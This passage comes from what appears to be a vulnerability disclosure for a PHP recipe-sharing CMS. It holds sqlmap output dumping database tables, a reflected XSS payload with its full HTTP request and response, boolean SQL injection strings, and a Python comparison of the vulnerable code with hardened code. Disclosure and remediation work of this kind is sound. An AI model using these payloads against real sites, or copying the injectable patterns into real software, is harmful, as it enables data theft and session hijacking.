| 4           | Chicken | In vehicula risus iaculis, placerat dolor a, accumsan elit. Phasellus vel sem in tellus maximus rutrum commodo non libero. Sed tincidunt libero elit, in commodo libero pulvinar lacinia.                                                                                                                                                                                                                                                                                                                                                                                    |
+-------------+---------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

[15:54:53] [INFO] table 'SQLite_masterdb.category_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\category_list.csv'
[15:54:53] [INFO] fetching columns for table 'sqlite_sequence'
[15:54:53] [INFO] fetching entries for table 'sqlite_sequence'
Database: <current>
Table: sqlite_sequence
[5 entries]
+-----+---------------+
| seq | name          |
+-----+---------------+
| 2   | admin_list    |
| 5   | category_list |
| 4   | user_list     |
| 3   | recipe_list   |
| 7   | comment_list  |
+-----+---------------+

[15:54:53] [INFO] table 'SQLite_masterdb.sqlite_sequence' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\sqlite_sequence.csv'
[15:54:53] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180'

[*] ending @ 15:54:53 /2021-09-29/

XSS Vulnerability Description:

The value of the page request parameter on Recipe Sharing Website – CMS (by:oretnom23) is copied into the HTML document as text between TITLE tags. The payload n0gg2</title><script>alert(1)</script>pfcjm was submitted in the page parameter and was echoed unmodified in the application’s response, so the injected closing tag ends the TITLE element early and the script that follows it is parsed as markup. An attacker can take control of some accounts by hijacking the PHPSESSID session cookie. A second vulnerable parameter is fullname in the login_registration app (see the stored-XSS proof below).

  • XSS Request:
GET /recipe_site/?page=view_recipen0gg2%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3epfcjm&rid=2 HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=pbvnfsmuchv0ri90bteh2bl3r6
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/recipe_site/?page=recipe&cid=3
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
  • XSS Response:
HTTP/1.1 200 OK
Date: Wed, 29 Sep 2021 07:50:33 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7630
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>: SQLite3::exec(): database is locked in <b>C:\xampp\htdocs\recipe_site\DBConnection.php</b> on line <b>76</b><br />
<br />
<b>Warning</b>: SQLite3::exec(): database is locked i
...[SNIP]...
<title>View Recipen0gg2</title><script>alert(1)</script>pfcjm | Try My Recipe</title>
...[SNIP]...
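As an added illustration of the two sinks this report describes (the cid value that sqlmap exploited above and the page value reflected into the TITLE element), here is a Python stand-in that is not code from the original report or from the oretnom23 project (which is PHP on SQLite). Each flawed pattern sits beside its hardened form: cid spliced into the SQL text versus a bound parameter with an integer check, and page written raw between the TITLE tags versus HTML-escaped on output. The schema, sample rows and function names are constructed for the example; the payloads are the URL-decoded values from the requests on this page.

```python
"""Added example, not code from the original report or the oretnom23 project:
a Python stand-in for the two sinks described above, each beside a hardened
form. Schema, sample rows and function names are constructed for the example."""
import html
import sqlite3

# Payloads as submitted in the requests on this page (URL-decoded).
SQLI_TRUE = "12345678' or '7775'='7775"
SQLI_FALSE = "77335599' or '5533'='5577"
XSS_PAYLOAD = "view_recipen0gg2</title><script>alert(1)</script>pfcjm"


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database; column names follow the sqlmap dump above,
    the rows themselves are constructed."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE category_list (category_id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE recipe_list (recipe_id INTEGER PRIMARY KEY,
                                  category_id INTEGER, title TEXT);
        INSERT INTO category_list VALUES (1, 'Vegies'), (2, 'Porks');
        INSERT INTO recipe_list VALUES (1, 1, 'Sample Menu'),
                                       (3, 2, 'Sample Recipe 102');
        """
    )
    return con


def recipes_vulnerable(con: sqlite3.Connection, cid: str) -> list:
    """The flawed pattern: cid is spliced into the SQL text, so a quote in the
    value ends the literal and the rest is parsed as SQL. The two payloads
    yield different row counts, which is the boolean-based signal the report
    relies on."""
    sql = ("SELECT recipe_id, title FROM recipe_list "
           "WHERE category_id = '" + cid + "'")
    return con.execute(sql).fetchall()


def recipes_fixed(con: sqlite3.Connection, cid: str) -> list:
    """Hardened form: reject anything that is not a plain integer id, then
    pass the value as a bound parameter so it is never parsed as SQL."""
    if not cid.isdigit():
        return []
    return con.execute(
        "SELECT recipe_id, title FROM recipe_list WHERE category_id = ?",
        (int(cid),),
    ).fetchall()


TITLE_TEMPLATE = "<title>{title} | Try My Recipe</title>"


def page_title_vulnerable(page: str) -> str:
    """The flawed pattern: the request parameter lands between the TITLE tags
    unmodified, so a '</title>' inside it closes the element early and what
    follows is parsed as markup."""
    return TITLE_TEMPLATE.format(title=page)


def page_title_fixed(page: str) -> str:
    """Hardened form: HTML-escape on output. '<', '>', '&' and quotes become
    entities, so the parameter can no longer close the element."""
    return TITLE_TEMPLATE.format(title=html.escape(page, quote=True))


def leaks_markup(rendered: str) -> bool:
    """Self-check: True when the rendered head carries a SCRIPT element or
    more than one closing TITLE tag, i.e. the parameter broke out."""
    low = rendered.lower()
    return "<script" in low or low.count("</title>") != 1


if __name__ == "__main__":
    con = build_db()
    print("vulnerable, true payload :", recipes_vulnerable(con, SQLI_TRUE))
    print("vulnerable, false payload:", recipes_vulnerable(con, SQLI_FALSE))
    print("fixed, payload           :", recipes_fixed(con, SQLI_TRUE))
    print("fixed, cid=1             :", recipes_fixed(con, "1"))
    print(page_title_vulnerable(XSS_PAYLOAD), leaks_markup(page_title_vulnerable(XSS_PAYLOAD)))
    print(page_title_fixed(XSS_PAYLOAD), leaks_markup(page_title_fixed(XSS_PAYLOAD)))
```

The same two measures carry over to the PHP application: SQLite3::prepare with bindValue in place of string concatenation, and htmlspecialchars on every request value echoed into the page. Since page selects a view, an allow-list of known page names is a further defence worth adding in front of the escaping.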

Reproduce:

href

Proof MySQL Injection:

href

Proof XSS-Stored Hijacking PHPSESSID:

href
